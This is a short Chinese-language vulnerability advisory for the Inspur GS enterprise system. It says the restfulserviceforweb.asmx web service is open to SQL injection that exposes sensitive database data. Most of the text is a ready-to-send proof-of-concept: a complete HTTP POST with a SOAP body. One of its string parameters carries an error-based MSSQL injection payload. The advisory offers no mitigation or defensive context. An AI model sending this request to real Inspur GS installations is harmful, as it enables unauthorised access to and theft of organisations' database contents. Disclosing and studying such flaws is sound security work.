漏洞描述
浪潮GS是浪潮研发的系统软件,浪潮GS,采用SOA 架构和先进开放的GSP应用中间件开发,面向大中型集团企业提供的一套数据集中、应用集中、管理集中的全面解决方案。浪潮GS系统restfulserviceforweb.asmx接口存在sql注入漏洞,攻击者可以获取数据库敏感数据。
浪潮GS的restfulserviceforweb.asmx存在sql注入漏洞
PoC代码
POST /GSPIDM/gsp/webservice/restfulwebservice/restfulserviceforweb.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.1617.9 Safari/537.36
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 1187
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<Get xmlns="http://tempuri.org/">
<Resource>AuthDataModify</Resource>
<Parameter>
<ArrayOfString>
<string>id</string>
<string>admin' AND 7707 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT(CASE WHEN (7707=7707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))--xMuK</string>
</ArrayOfString>
<ArrayOfString>
<string>location</string>
<string>0</string>
</ArrayOfString>
</Parameter>
</Get>
</soap12:Body>
</soap12:Envelope>